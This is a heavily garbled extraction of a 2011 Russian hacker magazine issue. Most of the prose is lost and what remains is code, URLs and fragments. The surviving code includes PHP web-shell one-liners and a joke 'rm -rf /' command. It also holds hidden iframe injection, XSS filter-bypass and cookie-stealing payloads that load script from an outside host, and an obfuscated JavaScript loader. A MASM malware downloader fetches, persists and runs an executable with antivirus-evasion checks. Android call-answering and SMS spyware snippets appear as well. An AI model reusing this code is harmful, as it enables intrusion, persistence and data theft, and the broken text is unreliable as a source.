,
, .
:). z
11 /154/ 2011
00000000
#hacker tweets
. . : , . , (@
asintsov) .
@jaredpar:
UDP ,
, ,
..
@kernelpool:

Windows 8.
(nt!ExpPoolQuotaCookie).
@moxie__:
: ,
.
:
. , (bit.
ly/qiWrtS).
@0x6D6172696F:
PHP
http://h.ackack.net/tinyphp-shell.html // <?=($_=@$_
GET[2]).@$_($_GET[1])?> no-alnum.
.
@thegrugq:
selective
disclosure, ,
. [
root]
:
.
. , :
<? $var1="system"; $var2="dir";
$var1($var2);?>. ,
:
http://localhost/shell.php?1=dir&2=system
@ 1 2
(, , ,
,
). ~ <?php
($_="system").$_("dir");?>.
@KrisBuytaert:
L
LDAP, S SNMP
:
LDAP = Lightweight Directory Access
Protocol
SNMP = Simple Network Management
Protocol
.
11 /154/ 2011
@chrisrohlf:

{NX, DEP, SafeSEH, SEHOP,
ASLR, RELRO, SmartPtrs,
SafeInt, /GS, Heap Cookies, Unlink
Checks ^'d fn ptrs, Reordered Vars, SDL,
Sandboxes}, , memory
corruption .

. :)
@dakami:
,

. ,
.
:

( ...)
@timROGERS:
10- IE6. ,
10-
, , 5 ...
@anonymouSabu:
:
'',
. .
@anton_chuvakin:
, ,
,

APS APT Prevention System
@zeminlu:
UNIX: sudo [
$[ $RANDOM % 6 ] == 0 ] && rm
-rf / || echo You live
@DidierStevens:
.
ASLR EMET' bottom up
randomization. -ASLR
, ASLR.
@SecureTips:
kenel.org, @
SecureTips runlevel 2,
rc3.d .
067
So Better
Iframe:

,
,

iframe, . ,

SMS-

, -
,

.
068
WARNING

. ,

,

.
WTF?
Iframe, , HTML,
-. ,
.
:
1. -. ,
;
2. , ,
LiveInternet ..
.
:
1. -;
2.
-;
3. Iframe- -
HTML-;
4. ;
11 /154/ 2011
Iframe:
NoScript Firefox
5.
( );
6. -
, , .
, :
()
?

.
.
1. .
, , . :

SEO-.
: US, UK, AU 100.
, .
- -
,
, , .
,

,
. ,
, .
, , ,
. :

.
, ,
.
2. , , , .

, ,
. , , ,
, .
,
, .
,
.
.
11 /154/ 2011
3. .
, .
,
. ,
-
.

. , .
4. SEO, .
.
,
. ,
,
.
5. .
,
. .

.
, . , , ,
. :
.
, , Word-
, .
, , ,
. ,
, .
?

: ? ,
.
1. .
, ,
, ,
. , .
,
, 100 .
, ,
. - , .
2. .
,
.
069

(
) -
. , ,
.
, ( , ..).
, .
? , ,
.
-, .
,
(, -).
,

. . ,
, , .
. ,
( ) (
) .
, ,
-.
070

IFRAME
, ,
. ,
. ,
:
1. .
, , ,

. , -
Malware Tracker'a.
,
,
.
2. .
-
, 100%

. (Adobe Flash
Player, Java, Adobe Reader), .
, ,
- .
Java,
. ,
.
3. .

. ,
? .
,
.
4. Iframe'.
,
.
, ,
.
No Ads- ,
Iframe', , NoScript (noscript.net).

, NoScript'a,
Plugins Forbid <IFRAME>.
5. JavaScript.
, ..
.
:). ,
,
.

11 /154/ 2011
Iframe:
3.
4.
5.
6.
7.

, .

.
/.
.
-,
.
.
,
,
.
, , , , , .
/ /
.
,
. - , ,
Zeus SpyEye,
,

.
, .
: ,
( ).
.
DDoS- .
-
-.
.
.
Rustock, 4
.
.
,
.

.
, ,
. , . , ,
HTML- -
11 /154/ 2011
( ,
iframe ):
<iframe src="http://site.ru/1.php" width="0" height="0"
frameborder="0"></iframe>
site.ru/1.php . :
width="0"
height="0"
frameborder="0"
,
. . , ,

. n- .
, ,
-,
. ,
,
.
,
. ,
. ,
. ,
. z
071
BEAST
072

SSL/TLS
SSL-
!

SSL.

,
BEAST
,
,
.
BEAST?
103 BEAST (Browser Exploit
Against SSL/TLS), PayPal. YouTube (bit.ly/
omqAsQ). .
Ekoparty -,
proof-of-concept.
, - .
-
, SSL/TLS ,
. , ,
,
.
, whitepaper'
11 /154/ 2011
BEAST: SSL-
(bit.ly/oBLWHX). : , HTTPS-,
, JavaScript Java, ( , ,
). ,

, .
?
SSL 3.0/TLS 1.0, .
SSL 1.0
SSL 1.0/TLS 3.0
, ,
. , , ,
. , .

.
,
2^128 ,
. ,
.
:
Ci = E(Key, Mi xor Ci-1)

XOR
(Initialization Vector, IV),
,
. .
, , , ,
. , SSL/TLS
, . SSL/TLS-
HTTPS-,
, ,
,
, .
CBC:
, .

, CBC- . ,
n (n-1).
, . SSL 3.0/TLS 1.0
, .
C = E(Key, M),

M , Key , C .
( , 16 ).
: ? ( 16 )
.
(ECB, Electronic codebook),
. : ,
.
,
.
(,
Cipher-block chaining),
XOR' :
11 /154/ 2011
,
BEAST , . :
, . :
- .
? ,
. , i- , , ,
( ).
Ci, Mi . , Ci = E (Key, Mi
xor Ci-1). , .
, ! , ( ) ,
073
CBC-
. , ,
( )
IV. ,
Ci Ci-1. .
,
:
ECB
, .
.
M1 = Ci-1 xor IV xor P.

,
:
C1 =
=
=
=
E(Key, M1 xor IV) =

E(Key, (Ci-1 xor IV xor P) xor IV)
E(Key, (Ci-1 xor P))
i
, , M1,
, , (IV xor IV)
( XOR). ,
( M
P),
C1 Ci! :

, ? ?
, TLS1.0,
. ,
BEAST,
TLS 1.1 .
? ! .
, TLS 1.1 , !
: ? ,
. ,
(TLS 1.0 SSL 3.0), Java. ,
, .
, , ,
M. M 16 .
, , , 2^15 (32 768) .
? ,
M. :
.
. , , .
. , ,
8 . , ,
. ,
15
,
. , ,
: user: alice password: ********, ******** .
, [lice password:
*] [*******.........],
. , 256 .
:)! ,
: 14 .

SSL
074
11 /154/ 2011
BEAST: SSL-
103 PayPal
, . :
256 , .
, .
BEAST ,

.
( ),
.

, .
BEAST,
:

, ;

;

(-) HTTPS-;
,
BEAST ,
( ).
, .
, : Javascript XMLHttpRequest API, HTML5
WebSocket API, Flash URLRequest API, Java Applet URLConnection API,
Silverlight WebClient API.
- , . HTML5 WebSocket
API, Java URLConnection API, Silverlight WebClient API. ,
,
HTML5 WebSockets.
, .
11 /154/ 2011
.
BEAST, ,
, Javascript/Java, .
JavaScript
. , ,
SOP (same-origin policy, ).
, JavaScript.
,
, ,

. ,
(, paypal.
com). SOP, Java 0day- .
, .
, - ? SOP,
(
), , .
(bit.ly/q6AebB).
RESPECT
,
,
, ,
.
, .
, . Good job! z
075
(icq 884888, http://snipper.ru)
X-Tools

:
Zdez Bil Ya
:
[i]Pro
:
Insecurity Research
URL:
bit.ly/q4PQte
URL:
bit.ly/pqcYCq
URL:
insecurityresearch.
com/insect
1

WORDPRESS P&E
-

WordPress!
,
. , : WordPress P&E Zdez Bil Ya.
,

. :
WordPress;
;
( );
.
,
.
.
,

302
403.
:
, .
, ,

wordpress.org.
076
2

WP BRUTE
WordPress.
WP
Brute, ,
, . ,
-
-,
,
? :
SSL;
(max. 50);
HTTP(S)-;
Source;

.
.

Source.txt :
admin:123
admin:qwerty
ololo:wtfwtf
,
.
3

INSECT PRO
INSECT Pro
.

.
,

Metasploit. , :
,
INSECT;
IPv4 IPv6 ;

- ;
//clientside ;
SQL/XSS/PHP-;
;
;
;
;
;
Metasploit.

,
,

.
, .
11 /154/ 2011
X-Tools
:
Turbo Mailer
URL:
bit.ly/oovCRY
][-

.

Mail.ru.

. ,
:
e-mail
mail.ru;

;
6 40 ;
;
;

;
;
;
;
antigate.
com;
;
(HTTP/SOCKS4/
SOCKS5);
mail.ru .

.
, , .
:
M@xPain, Perplexity
:
@MaxPainCode
:
_Alien_
URL:
twitter.com/maxpaincode
URL:
twitter.com/#!/maxpaincode
URL:
bit.ly/r37TAL
4
VULNERABILITY MASTER:
GOOGLE-
Vulnerability Master
,
. , ,
. :
;
SQL-;
;
SQL.
,
-:
1. (, cmspages.php?id=, game.
php?id=, index.php?id= ..);
2. ( 100);
3. (
inurl:);
4. Scan;
5.

Vulnerability Scanner.

, .
, , ,
.
11 /154/ 2011
MAIL.RU TURBO MAILER
5

DDOS-
DDoS Tracer -,
,
.

, ,
. : DDoS Tracer .
:
1. -
,
;
2. ,
;
3.
,
, .
- :
;
;

DDoS-;
.

bit.ly/nHHxAm.
6
DED TOOLZA:

Ded Toolza . ,
. :
/
( );
-;
;
ClearLock;
VNC-;
;
;
CMD,
.
,
. :
1. (
);
2.
;
3. (,
);
4. .

, .
077
|qbz| (lopuxin.iv@yandex.ru, http://essenzo.net)
XSS:
- !
XSS
5

XSS .

,

!

.

,
XSS .
078
INFO
XSS -,

JS-.

- ,

,
XSS , . PHP

HTML-, .
htmlspecialchars() strip_tags().
,
"<" ">" strip_tags().
, ,
:
WARNING

. ,

,

.
WWW
raz0r.name
XSS
ha.ckers.org/
xss.html

XSS
kanicq.ru/sniffer

bit.ly/bK7NW7
XSS
drakasmit.ru/kakrabotal-xss XSS
SEO
<?php
echo('<img src="'.strip_tags($_GET['img']).'">');
?>

<script>, - :
<img src="[ script]">
JavaScript, <script>? JS-
HTML-.
, , IMG. onError
(
Google), :
<img src="img.jpg" onError="alert('
');">
JavaScript-, .
$_GET['img']:
11 /154/ 2011
XSS: - !
-5 XSS
1. htmlspecialchars().
HTML, , .
2. strip_tags().
htmlspecialchars()
,
, . : <, >, < img.
3. BB-.
, ,
HTML:
[video=http://video.com/video.mp4]My Video[/video]
4. .
- , - , -
, .
HTML-
.
$res[] = ord($sym);
}
return implode(", ", $res);
}
echo(vcifry(" JavaScript"));
?>
JavaScript :
<script>eval(String.fromCharCode(118, 97, 114, 32, 105,
...
110, 116, 46, 99, 111, 111, 107, 105, 101, 41, 59))</script>
, <>:/.=

JavaScript .
.
*.js-, , ,
, -.
:
<script src=http://nash.host.ru/script.js></script>
,
, ,
.
5. .
,
XSS, . - .
!@#$%^&" onError="alert(1);" musor="

:
alert('XSS')
<img src="!@#$%^&" onError="alert(1);" musor="">

,
onError 1. ,
alert(1); JavaScript-, .
,
htmlspecialchars(), HTML-
.
, <>().,/
, < >
, , , , .
?
JS-, .
JavaScript, : eval() String.fromCharCode().
JavaScript,
.
.
PHP:
<?php
function vcifry($text)
{
$res = array();
foreach(str_split($text, 1) as $sym)
{
11 /154/ 2011
JavaScript
079
!

XSS?
:
,
XSS ,
cookie .

,
,

.
(, ,
)
XSS
. ,
iframe
.
<?php
...
$id = mysql_fetch_array(mysql_
query("SELECT id FROM kapchi;"));
$captcha_id = $id['id'];
echo('
...
<h1 style="color:gray;fontfamily:verdana;">,
:</h1>
<img src="http://nash.host.ru/captcha.
php?img='.$captcha_id.'">
...
');
?>

.

,
,
:
$session = md5($login.":".$passwd.":".$_
SERVER['REMOTE_ADDR']);
.
.
:
/changePasswd?oldpassword=[
]&newpassword=[ ]

iframe, :

JavaScript + PHP

.
,
:
CSRF
, /,
,
ip-,
. XSS .
, ,
. ?
,
:
<html>
<script>
document.getElementsByTagName('html')
[0].innerHTML += '<iframe src="[
]" border="0"
frameborder="0" width="0" height="0"></
iframe>';
</script>
...
</html>
<script src="http://nash.host.ru/script.
js">
// script.js
login=admin
password=1234
session=f13db539e8aebff0c82ce57a05d17b9f
, ,
,
.
, <>:;/,=
data,
base64 src. :
<script src=data:;base64,YWxlcnQoKTs=></script>
data
:
data:MIME-;,
alert(),
base64. ,
,
.
XSS
,

080
JS-
HTML- , ,
JavaScript! :
<html>
...
<script>
var a = "<?php echo($_POST['data']); ?>";
// "a"
11 /154/ 2011
XSS: - !
</script>
...
</html>

HTML- ,

:
123"; alert(document.cookie); b="
alert-, :
<html>
...
<script>
var a = "123"; alert(document.cookie); b="";
// "a"
</script>
...
</html>
BB-
,
BB-,
, : [a], [img], [b].
, -
"[" "<", .
js-.
:
XSS WordPress
[img src="!@#$%^" onError="alert(1);"]

:
<?php
...
echo('<input type="text" value="'.strip_tags($_
POST['data']).'">');
...
?>
? , , onMouseOver. , , ,
(
).
input. style. ? ,
.
.
:
" onMouseOver="alert(document.cookie)"
style="position:absolute;
top:-1000px;left:-1000px;width:5000px;height:5000px;z-index:10000;"
musor="

JS- .
javascript: alert(1);. , :
XSS DuoCMS
<script src="javascript:alert(document.cookie);"></script>

- , <>.

, ,
XSS
/. ,
: body, script, javascript.
bOdY, sCrIpT JaVaScRiPt, .

,
.
, .
, .
:
$code = str_replace("<body", "", $code);
<a href="javascript:alert(document.cookie);"> </a>

<iframe src="javascript:alert(document.cookie);"></iframe>
11 /154/ 2011
081

XSS-

XSS:

XSS (, )
.
: /,
VPN, .

Opera (
cookies),
.
.
,
JS-.
,
javascript:document.cookie="key=value";
(
Enter).

- "><script>alert(1);</
script>. ,
, 2 ,
.
XSS
.
,
"<" ">"
"<!>". HTML ,

,
:
Dead <Body> Track 6.mp3
.
XSS

XSS
.
, .
. HTML
:
<body onLoad="location.href='
'"></body>
-
(, dalmatincy.fhost.ru) oshibka.
jpg .htaccess
:
AddType application/x-httpd-php .jpg

:
,
,
: http://dalmatincy.fhost.ru/
oshibka.jpg

iframe .
iframe
JS :
<script>var l=['reverse','join','split',
'slice','93B','2C5F//
...
/9/43D225F//73/3/F/E74223E3C2F/4/97/3E27
293'],i1='6',
il='con\x73\x74\x72\
x75ctor',ll='',_=['length',
'unescape'],li=[],l1=this;l=l[l[3]](4)
[l[0]]()
...
join(ll))();</script>
JavaScript
.
function recursiveReplace($text, $replace, $repalce_to)

{
$text = str_replace($replace, $repalce_to, $text);
return (strstr($text, $replace)) ?
(recursiveReplace($text, $replace, $repalce_to)) :
($text);
}
$code = recursiveReplace($code, "<body", "");
<body ,
. :
082
JavaScript flash
,
flash-
.
-,
.

HTML- ,

XSS. -
.

Gareth Heyes:
javascript:/*--></marquee></script></
title></textarea></noscript></style>
</xmp>">[img=1]<img -/style==expression&#40/*/-/*',/**/
eval(name)//);width:100%;height:100%
;position:absolute;behavior:url
(#default#VML);-olink:javascript:eval(title);-o-linksource:currentname=
alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=
eval(name) onmouseover=eval(name) backgr
ound=javascript:eval(name)//>"
, ,
(twitter.com/#!/garethheyes). , XSS, ,

, .

- .

. ,
XSS,
.
<bo<bodydy onLoad="alert(1)">
<body :
<body onLoad="alert(1)">
, , -
, .
, . ,
,
, z
11 /154/ 2011
Preview
92

,
,
, .
2008
Dropbox,
, ,
.
,
, ,
.
Python,
Amazon S3+EC2, 25
.
MALWARE
84

.
.
UNIXOID
88

Android Market ,
.
?
CODING
106
ANTIHASP

HASP.
, .
11 /154/ 2011
114

Linux-
30% ,
5% , 128
-? !
SYN/ACK
110
DLL-
,
exe- ,
.
DLL .
129

,
,
. ,
.
083
MALWARE

AVG, AVAST, CLAMAV, PANDA,
COMODO: ,

,

, .
:).

.
,
? ,
, ,
.
,
?
084
DVD

.
: AVG,
Avast, ClamAV, Panda, Comodo. ,
, , , , . VmWare
Windows XP SP3 x86.
,
MASM. (xakep.ru/post/56236/default.asp) , Downloader,
, .
x86, ,
Windows.

:
.data
pi PROCESS_INFORMATION <>
startupinfo STARTUPINFO <>
.data
pKey dd ?
RunKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0
Malware db "Malware",0
11 /154/ 2011
comodo . !
.code
url db "http://www.malwareurl.com/malware.exe",0
pathtosave db "c:\windows\system32\malware.exe",0
start:
invoke URLDownloadToFileA, 0,
offset url, offset pathtosave, 0, 0
invoke RegCreateKeyExA, HKEY_LOCAL_MACHINE,
offset RunKey, 0, 0, REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS, 0, offset pKey, 0
invoke lstrlenA, offset pathtosave
invoke RegSetValueExA, pKey, offset Malware, 0, REG_SZ,
offset pathtosave, eax
invoke RegCloseKey, pKey
invoke CreateProcessA, offset pathtosave, 0, 0, 0,
NORMAL_PRIORITY_CLASS, 0, 0, 0, offset startupinfo,
offset pi
invoke ExitProcess, 0
retn
URLDownloadToFile,
CreateProcess. . , . ,
Downloader AVG
ClamAV. AVG , ClamAV, , Win32/DH W32.SPERO.Prolixus.0825 . .
clamav ,
, . !
mov eax, [eax + 10h]

mov eax, [eax + 03Ch]
mov eax, [eax]
cmp eax, dword ptr [discCroot]
jz malware_code
jmp exit
malware_code:
,
.
. , :).
EAX
30h FS. Windows NT PEB (Process Environment Block).
, .
, 10h PEB RTL_USER_PROCESS_PARAMETERS.
3C.
,
. ,
C, EAX discCroot.
,
.
, EAX C,
.
, , , ,
. , ,
,
.

,
kernel32. :
kernel32 db "kernel32",0
dword_PE db "PE",0,0
discCroot db "C", 0, ":", 0

start:
assume fs:nothing
start:
push offset kernel32
call LoadLibraryA
mov eax, fs:[30h]
mov ecx, [eax + 03ch]
11 /154/ 2011
085
MALWARE
/AV-
AVG
Win32/DH
Win32/DH
Win32/DH
Avast
W32.SPERO.Prolixus.0825
Panda
Comodo Internet Security
ClamAV Immunitet
mov eax, [eax + ecx]

cmp eax, dword ptr [dword_PE]
jz malware_code
jmp Exit
kernel32.
e_lfanew IMAGE_DOS_
HEADER.
. PE-, LE- NE. , ,
PE\0\0. .
, , , , , downloader.
.

, API.
,
. TreeResetNamedSecurityInfo:
.code
pathtosave db "malware.exe",0
start:
invoke TreeResetNamedSecurityInfo,0,0,0,0,0,0,0,0,0,0,0
cmp eax, 78h
jz Malware_Code
jmp Exit
MSDN, security information
.
, 78h.
,
- -,
, , ExitProcess.
- AVG,
, , ClamAV.

, ,
.
:
.code
pathtosave db "malware.exe",0
start:
mov ecx, 5000h
push ecx
Cycle_Begin:
call GetTickCount
sub edx, eax
push 1000h
call Sleep
push 0
call GetModuleHandle
pop ecx
dec ecx
push ecx
jnz Cycle_Begin
5000h
GetTickCount, GetModuleHandle Sleep, 1000h.
,
(
Downloader :
1000h * 5000h = 5 000 000h = 83 886 080 = 83 886 = 1398 = 23
). , ( - ),
.
,
. .
ClamAV , W32.
SPRO.Prolixus.0825.
AVG.
086
. Panda ?! ClamAV
, ?! AVG, ,
?! , , . z
11 /154/ 2011
Zeronights
ZERONIGHTS

.
, , security-
. , ,
Zeronights,
25 .
DEFCON
Digital Security.
,
,
0day .
, ,

,
. , : ,
(CEO Immunity, ),
(CorelanTeam, ), The Grugq (COSEINC,
), (PWC, ),
(DigitalSecurity, ),
( X, ) (ESET, ).
:
(Cisco).
! :
?.
11 /154/ 2011
(Amorize).
, , X-Probe.
. :
-.
(NetSquare). ,

.
. : - 3.
(DigitalSecurity).
.

?.
(ESET). Virus-Freeman
. :
.
(Digital Security).
SAP .
. FastTrack: , :

.

, . !
FAST-TRACK
,
, , ,
,
. 15
,
. ,

5
,
.

,
-.
Zeronights .
-
.

0day .
AC-, , SAP
! ,
WAF,
(lockpicking) c , . z
087
MALWARE
ka Night Storm (nstorm90@gmail.com)
088
11 /154/ 2011
WARNING
WWW
WARNING

.
,

blog.trendmicro.com
Trend Micro,

,

,
.
Google++
www.brighthub.com/mobile/
google-android.aspx
,

Android,
.

. ,

.
SMS?

:

?

OC Android .

,
, ,
.
.

. , ,
.
, ,
Google , , .
, Google , , (Myournet), , ,
.
,
, .
,
,
,
.
:
/shangzhou/callrecord
*.amr. , -,
, -
11 /154/ 2011
, . ,
, ,
;).

Google++, .
,
.
: ,
. ,
, , ,
,
.

Google ,
. , :).
( Apple AppStore) ,
.
.
,
? ? ,
. :). , ,
.
1. . - .
,
. , , , ,
,
, ..
2. . Myournet: Guitar Solo Lite
Super Guitar Solo, Super Sex
Positions Hot Sexy Videos. , ? ,
Super, Hyper :).
3. .
: , , GPS,
. ,
, ,
, , .
089
MALWARE
GOOGLE++
Google++,
,
Trend Micro. ,

. , .
: ,
.
private
{
int i
int j

void silenceResponse()
= Log.w("spy","silenceResponse");
= this.audioManager.getRingerMode();
this.oldRingerMode = j;
int k = this.audioManager.getVibrateSetting(0);
this.oldRinger = k;
int m = this.audioManager.getVibrateSetting(1);
this.oldNotification = m;
this.audioManager.setRingerMode(0);
this.audioManager.setVibrateSetting(0, 0);
this.audioManager.setVibrateSetting(1, 0);
}
090
Advanced task killer

private void answerCall() {
try {
PhoneUtil.getITelephony(this.tm).silenceRinger();
boolean bool = PhoneUtil.getITelephony(this.m).
showCallScreenWithDialpad(0);
PhoneUtil.getTelephony(this.tm).answerRingingCall();
Thread.sleep(800L);
goToHomePage();
setKeyguard(0);
return;
}
}

, , ,
. ,
Android. , :
SmsManager:

private static final int ReqCodeSms = 123;
public synchronized void SendSms(String phone,
String text){
11 /154/ 2011
PendingIntent Result = createPendingResult(

ReqCodeSms, getIntent(), 0);
SmsManager.getDefault().sendTextMessage(phone,
null, text, Result, null);
Activity"></service>
Service_Activity .
, , :
}
, . , .
, Scripting Layer For Android,
.
,
public class Service_Activity extends Service {
private Timer timer = new Timer();
public void onCreate(){
super.onCreate();
startservice();
}
?
, . , ,
.
, Advanced Task Killer. :
- , .
private void startservice(){

timer.scheduleAtFixedRate(new TimerTask(){
public void run(){
//
//
}
},0,1000);

- , ,
Android-
.
, , .
, . -, Android ,
Home,
, Home
.

. : ( ),
. -
,
, ,
( , :)). ,
, root-, , , (
) ,
-, .
, ,
API Android, , . Android 2.2 :

DevicePolicyManager devicePolicyManager =
(DevicePolicyManager) getSystemService(
Context.DEVICE_POLICY_SERVICE);
devicePolicyManager.lockNow();
,
, -
, .
:
Android . . Eclipse
. ,
AndroidManifest.xml. :
<service android:enabled="true" android:name=".Service_
11 /154/ 2011
}
private void stopservice(){
if(timer != null) {
timer.cancel();
}
}
}

,
. , ,
, . ,
.
?
,
,
. ,
Google ,
.
,
, ,
? , ,
. , ,
(,
,
).
:
. Location & security
.
: - ,
, , ,
, . :
, - , , .
- , ,
. ,
,
. z
091
Mifrill (mifrill@gameland.ru)
Dropbox
.
.

,

?
.

Dropbox
092
11 /154/ 2011
DROPBOX:

25

Dropbox
: 27-
, .
Dropbox', ,
.
,
, -
, .

.
, ,
. -,
. -, ,

.
. ,
, , ,
(
) . 5
success story,
. . ,
.

Dropbox Bit9, Accolade
Hubspot,
. ,
, :
11 /154/ 2011
5 ,
14 .
,
. ,
Dropbox , ,
, -
,
. :). ,
,
, , .
-
, , .
, ,
4 ,
.

Dropbox.
DROPBOX
Dropbox
.
Dropbox
Skype, QIP .
Dropbox ,
, .
Dropbox
.
Dropbox .

2007
, Dropbox Inc.
. ,
,
,
.
(bit.ly/raHM1K),
- Y
Combinator. , , ,

Python, sqlite ( ), mysql ( ),
turbogears Amazon EC2 S3

Wiki :
wiki.dropbox.com/TipsAndTricks.
093
, .
:)
. Dropbox
.
. ,
.
:
subversion, trac rsync

Dropbox.
,
,
. ,
: v2 11-15-06.doc.
(beinsync, Foldershare),
(Carbonite, Mozy),
/
,
.
3
. 5
. 2 .
. Python C++,
Cheetah, - ..
freemium, 1

( $5, ,
, ,
- $20 ).
.
094

.
Dropbox
Dropship.

,

.
Dropship, , MIT Dropbox
.
Dropbox:
, Dropbox,
Dropbox
. , ,
.avi-, ,
Dropbox . Dropship
,
(!) ,
Hacker News,

github.
. Dropship

,
github, Dropbox.
Dropbox
.
,

.

2011,
Dropbox.

. Dropbox
. ,
-, :
config.db,
%APPDATA%\Dropbox
.
email, dropbox_path host_id.
,
.
Dropbox
host_id, config.db
.
, config.db
Dropbox
,
.
, , ,
host_id
.
,

. FAQ Dropbox : AES-256

. - ,

: Dropbox ,
,
,
.
Dropbox ,
,
, , ,
.
,
2011
USENIX Security Symposium
Dropbox.
Dropbox
,
. ,
- ,
Dropbox. ID .
, ,
Dropbox
SSL URL.
-
ID, ID
,
.

: $233-388,
$99
11 /154/ 2011
>> coding
Dropbox , .
2007 $15 000

Y Combinator.

, 15 .

-,
Sequoia Capital.
,
$1.2 . 2008
$7.2 . , , .

, ,

. 2008 Dropbox

.
, .

. ,
Dropbox ,
getdropbox.com

email, .
2008
, ,
,
.
, . ,
, .
,

Dropbox
-. Digg, Dropbox

? ,
7-10 .
15 000 .
,
12 000 ,
wait-list 75 000 !
Dropbox,
TechCrunch50
2008 ,
. ,
. ,
, 2008
, ,
.
PR - . ,
, ,
,
. .
SEO-, Dropbox

. , ,
,
,
,
. Dropbox,
. SEO' :).
( , ), ,
:
$233-388, $99
! Epic fail!
: ,
, , ,
.
Dropbox ,
.

, , : 2009
1 .
, Dropbox
.
. ,
Dropbox

Dropbox, ,
, ,
:
:
! ?
: - ?
: ...
: , ?
096
11 /154/ 2011

. Dropbox
, ,
. ,
,
.
IT- ( NY Times The Wall
Street Journal Dropbox
:), , .
,
, ,

, - ,
, . ,

.
, , .
,
. ,

250 (
+500 ).
8 ( 16 32
).
! . 2010 ,
, 2.8 .
!

Dropbox.
.
!
100 , 2010
4 , 25 .
60%- .
DROPBOX
,
. , . , Dropbox
2% .
2010 $14 . ,

Amazon,
. , ,
,
Dropbox $30 . $100 .
TechCrunch, Dropbox $200
$300 ,
$5-6 !
, ,
2011
(8120 ..
1022 ..) ,

65 400+ . . z
11 /154/ 2011
097
000, 00spersky Lab

000, 00
BRIEF
2008

.

ERPScan SAP.

Oracle :
.

: BlackHat, HITB,
HackerHalted, Source,Confide
nce,DeepSEC,Troopers,
SecurityByte ..
0000
:
, ,
,
.
098
11 /154/ 2011
00000000
SH2KERR
DIGITAL SECURITY
,
.
-,
:
,

- SAP.
11 /154/ 2011
SAP
? ?
, , e .
,

. , e e .

. , , ,
,
. -
, .
, ,
( , , , ).
, - ,
PHP-. -
,
, e
, , , e
. , : ,
XP,
. ,
,
, ,
.
ASLR. ,
, , e,
, e.
099
, ,
, .
,
,
. ,

.
, :
, ,
, .
,

.

,
, ,
.
, .
.
(, ,
). ,

e
. -
.
,

,
. , ,
, e, e,
:).

ORACLE?

.

,
(,
Wi-Fi, )
, web :).
,
ORACLE. ?
?
, ,
,
- ,
.
.
, ,
. e
, .
, , :
, e 10
. , :).
,

?
,
?
, e,
.
(
, ).
.

?
?
.

,
: e,
, ,
.
,
, e
-
- .
, e ,
, ,
, ERP ( SAP).

.
?

SAP ERPScan. e, , :
, , ,
, / .

-
. SAP -
(SCADA). ,
,
. SAP
, SCADA
. , , SAP
, ,
.
, ,
.
.

.
,
. ?
, ,
, e
,
. , -
, , ,
SAP
.

:).
,
?

Onapsis X1.
e-
:
,
.

,
.
,

.
e ,
,

(),
SAP
( e
).

ERPSCAN ?
ND.
,
,
.
, .
e, , .
, . ,
, ,
, .
, (,
, ,
,
).
,
. .

SAP?
2008 : ORACLE
100
11 /154/ 2011
00000000
SAP, ,
. Product Security Response
Team, ,
. e ,
,

-
SAP, ?
e.
,
,
,
.
,
, e . ,

e. ,
SAP , e,
.
,
, ,
BlackHat
0day-,
SAP-.
SAP ,
SAP .
,
Pending-.
e :).
, e :
,
,
.
,
, .
.
Rapid7 , :).
: ,
, ,
. : 15
000 5 :).
, ,
e :).
. - ,
- HDMoore, - .
- .

. , ,
. .

Oracle-
, .
,
, .

. ?
- ?
- ?
. , ,
,

.
, ,

. ,
e.
- ,
-
, PDF
, . ,
, ,
.
,
.

DEFCON
BLACKHAT, ?
,
?
,
,
, .
,
-.
.
SAP-. ,
SAP-,
. google.com,

:). ,
, . :
, -
, ,
, ,
! ,

,
.
, ,
.
,
,
.
.
,
25, ,
.

,
. , e
- , ,
,
. ,

e .
:
, e , e
, ,
.
. e
.
,
, .
, ,
.
-
: , , e,
, , ,
:). z
DIGITAL SECURITY 2002
11 /154/ 2011
0101
daredavil2014 (devil@softcom.lv)

,
.
:
.
,
.
WWW
www.esolangs.org
,
wiki

4mhz.de/bfdev.html
IDE brainfuck'a
"" Piet .
102

, ,
, - , , , . (,
, ).
, , ,
. 70-
,
, .

.
, ,
- , -
.
, ( ),
,
.
, .
- Brainfuck FALSE ,
.
11 /154/ 2011
,
(Turing tar-pit), ,
, .
-,
.

. ,
, ,
.
,
,
. , ,
.
,

.

. :
.
, ,
,
. ,
, ,
.

-. .
, ,
.
, F(a) = b,
, , a
b.
, ,
a, , F(a) = b.
, .
- ,
, ,
, .
- : f a
f.a, F(a),
, , a
BRAINFUCK
MALBOLGE
, .
, .
,

. ,

, Brainfuck.
. , , ,
BF - , ,
.
brainfuck,
, brainfuck-. , , (Cow),
(Owk, - ).
,
.
, ,
Malbolge,
.
, hello
world,
.
2004 . , , , ,
, , ,
Anthony Youhas.
,
. ,

, , (, ,
), hello world:

,
.

, .
,
.
,
,
, 5060- .
,
- ,
, , .

,
, .

, ,
, .
,
, . , ,
?
++++++++++[>+++++++>++++++++++>+++>+<<<<-]>++
.>+.+++++++..+++.>++.<<+++++++++++++++.>.+++.
------.--------.>+.>.
11 /154/ 2011
(=<`:9876Z4321UT.-Q+*)M'&%$H"!~}|Bzy?=|{z]Kw
ZY44Eq0/{mlk**hKs_dG5[m_BA{?-Y;;Vb'rR5431M}/.
zHGwEDCBA@98\6543W10/.R,+O<
103

f a. b- ( ).
( , ), :
, :
F(x1,x2,...,xn): F(x1,x2,...,xn) = x1*F(1,x2,...,xn)
v!x*F(0,x2,...,xn).
(
), , *,v,! (, ), ,
, . ,
(
) .
:
( ),
. : , , .
, ,
, . :
,
, .
, ,
.
, ,
.

,

, .
, , , ,
.
, ,
,
. z
INTERCAL
, , . 1972 , ,
( ). -
,
PLEASE
(), FORGET () ABSTAIN ().
,

PLEASE ABSTAIN FROM CALCULATING (
).
DO ,1 <- #13
PLEASE DO ,1 SUB #1 <- #238
DO ,1 SUB #2 <- #108
DO ,1 SUB #3 <- #112
DO ,1 SUB #4 <- #0
DO ,1 SUB #5 <- #64
DO ,1 SUB #6 <- #194
DO ,1 SUB #7 <- #48
PLEASE DO ,1 SUB #8 <- #22
DO ,1 SUB #9 <- #248
DO ,1 SUB #10 <- #168
DO ,1 SUB #11 <- #24
DO ,1 SUB #12 <- #16
DO ,1 SUB #13 <- #162
PLEASE READ OUT ,1
PLEASE GIVE UP
SHAKESPEARE
.
. ,
, /,
.
, Enter,
Exit. ,
.
:
[Enter Hamlet and Romeo]
Hamlet:
You lying stupid fatherless big smelly half-witted coward! You are as
stupid as the difference between a handsome rich brave
hero and thyself!
Speak your mind!
